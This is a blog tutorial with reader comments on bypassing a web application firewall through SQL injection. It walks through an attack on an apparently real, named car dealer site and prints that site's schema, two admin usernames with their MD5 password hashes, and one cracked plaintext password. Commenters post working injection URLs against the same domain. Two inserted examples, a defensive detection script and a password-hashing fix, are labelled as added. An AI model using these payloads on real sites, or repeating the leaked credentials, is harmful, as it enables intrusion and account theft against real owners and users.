Video Demonstration
Hello Security Explorers, welcome to Security Explored.
This is the next tutorial in the SQL Injection series:
WAF Bypassing Through SQL Injection.
WAF stands for Web Application Firewall.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
Now we are moving a step forward in SQL injection, to advanced SQL injection.
In this tutorial, I assume that you know basic SQL injection.
If you don't, then you should read my recent tutorial with a video demonstration.
Read this tutorial first.
Now I have an SQL-injection-vulnerable site with a WAF enabled.
To check for the vulnerability,
It shows an error:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1”
This means it is vulnerable.
Now, to find the number of columns,
This means there are only 7 columns in the database.
Now the real thing starts.
Now, to find the vulnerable columns,
On loading this URL we get this error:
Not Acceptable
An appropriate representation of the requested resource /faq2.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
This error is due to the WAF: the WAF is not allowing us to send a malicious query and is blocking it.
Now, to bypass the WAF, we are going to use SQL inline comments, built from the characters "/", "*" and "!".
We have to apply these comments to the parts of the query on which we want the server to focus.
Now, to bypass the WAF and get the vulnerable columns, we modify the syntax,
Here you see we get all the vulnerable columns.
The vulnerable columns are 2,3,4,5,6.
We are going to inject into these columns.
You will have noticed that I used a mix of capital and small letters in “union all select”. Using this helps in WAF bypass.
Now, to get the MySQL database version and the current database,
Next, as you all know, we get the table names. For this,
We get these tables: 9791614_offers,C1on33_offers,apr,faq,newsletter,users
As I want to extract the admin username and password, I will use the “users” table.
In some sites you have to provide more inline comments to get the table and column names, like,
/*!table_name*/ makes the server focus on table_name in the query and gives efficient results.
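Why a literal rule misses the mixed-case and inline-comment requests described above, and the normalization a detection rule needs before matching, shown as an added example that is not part of the original tutorial. The rule names, `NAIVE_RULE` and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# A literal, case-sensitive rule of the kind the tutorial's requests get past.
NAIVE_RULE = re.compile(r"union (all )?select|order by \d+")

# MySQL runs the body of /*! ... */ (optionally version-prefixed, such as
# /*!50000 ... */) and treats a plain /* ... */ as whitespace.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

SIGNATURES = {
    "union-select": re.compile(r"\bunion (all |distinct )?select\b"),
    "column-count-probe": re.compile(r"\border by \d+\b"),
}

def normalize(raw_query: str) -> str:
    """Reduce a query string to roughly what the database will parse."""
    text = unquote_plus(raw_query)
    prev = None
    while prev != text:  # unwrapping can expose another versioned comment
        prev, text = text, VERSIONED_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower().strip()

def naive_match(raw_query: str) -> bool:
    return bool(NAIVE_RULE.search(unquote_plus(raw_query)))

def detect(raw_query: str) -> list:
    """Names of the signatures that match after normalization."""
    text = normalize(raw_query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

# Constructed sample query strings, not captured traffic.
SAMPLES = [
    "id=15",
    "id=15+oRdEr/**/bY+8--",
    "id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--",
    "id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--",
    "id=-15+/*!UnIoN*/+all+/*!SeLeCt*/+1,2,3,4,5,6,7--",
    "q=student+union+selection+committee",  # benign text
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"naive={naive_match(q)!s:<5} normalized={detect(q)} {q}")
```

The literal rule misses every obfuscated sample and still flags the benign last one, while the normalized signatures do the opposite. Pattern matching of this kind only narrows the window; the injection itself is closed by binding `id` as a query parameter in the application.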
To get the columns,
Again, on some sites this will show a “Not Acceptable” error, so you have to add more inline comments and your URL will be,
You will get these columns: id,headline,offer,price,contact,id,headline,offer,price,contact,apr,updated,id,title,p1,p2,p3,p4,updated,id,email,name,surname,address,phone,curr_car,year,id,username,password,email
Again, I need the username and password, so the columns I am going to dump are “username” and “password”.
To dump them,
Here we get this:
SeanMcB:be5f032a39040e000b0cc2bf0887d496,Clon33M:83d385aa20740f16ca7fee506e37fc48
Here you see we have two admins.
The usernames are SeanMcB and Clon33M, and
be5f032a39040e000b0cc2bf0887d496 and 83d385aa20740f16ca7fee506e37fc48
are the MD5 hashes of the passwords, so you need to decrypt them (strictly, MD5 is a one-way hash, so this means looking the hash up rather than decrypting it).
To decrypt them go to http://www.md5decrypter.co.uk
Paste your MD5 hash there, enter the captcha code and click on decrypt hash.
The plain text of
be5f032a39040e000b0cc2bf0887d496 is rZ23MHq
You get usernames and passwords
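Why these values fell to a lookup site, and what the site owner's fix looks like, as an added example that is not part of the original post: unsalted MD5 gives every user with the same password the same digest, so the code below verifies legacy records and replaces them with salted PBKDF2 on the next successful login. The record format, function names, iteration count and accounts are assumptions made for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor

def legacy_md5(password: str) -> str:
    """Unsalted MD5 hex digest, the format of the dumped values above."""
    return hashlib.md5(password.encode()).hexdigest()

def make_record(password: str) -> str:
    """Salted record: pbkdf2$<iterations>$<salt hex>$<key hex>."""
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2${ITERATIONS}${salt.hex()}${key.hex()}"

def check(password: str, record: str) -> bool:
    if record.startswith("pbkdf2$"):
        _, iterations, salt_hex, key_hex = record.split("$")
        key = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                  bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(key.hex(), key_hex)
    return hmac.compare_digest(legacy_md5(password), record)

def login(db: dict, user: str, password: str) -> bool:
    """Verify a login; on success replace a legacy MD5 record in place."""
    record = db.get(user)
    if record is None or not check(password, record):
        return False
    if not record.startswith("pbkdf2$"):
        db[user] = make_record(password)
    return True

def demo() -> dict:
    # Constructed accounts and password, not values from the page.
    db = {name: legacy_md5("correct horse") for name in ("alice", "bob")}
    assert db["alice"] == db["bob"]  # same password, same unsalted digest
    for name in db:
        login(db, name, "correct horse")
    return db

if __name__ == "__main__":
    for name, record in demo().items():
        print(name, record[:40] + "...")
```

After `demo()` the two accounts hold different records even though the password is the same, so a precomputed table of MD5 digests no longer applies to either.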
Now the next thing is to find the admin page.
Again, I recommend Havij to find admin pages.
Here, in this case, the admin page is
If you have any problem or any query then feel free to contact me at cyberdash@live.in
Or contact me at http://www.facebook.com/cyberdash
good,thanks
I tested it,
http://cloneemotorcentre.ie/faq2.php?id=-15/**/uNiOn/**/SelEct/**/1,2,3,4,5,6,7--
can bypass it ....
@独自等待 yup you can bypass it ......u just need to provide inline comments in the syntax to bypass WAF
we can just change a letter to capital for http://cloneemotorcentre.ie/faq2.php?id=-15%20uniOn%20all%20seLect%201,2,3,4,5,6,7--
I can't log in with admin's information. The site always says "Unknown column '83d385aa20740f16ca7fee506e37fc48' in 'where clause'"
order by is not working
after I skipped and tried to go for union select, it's also not working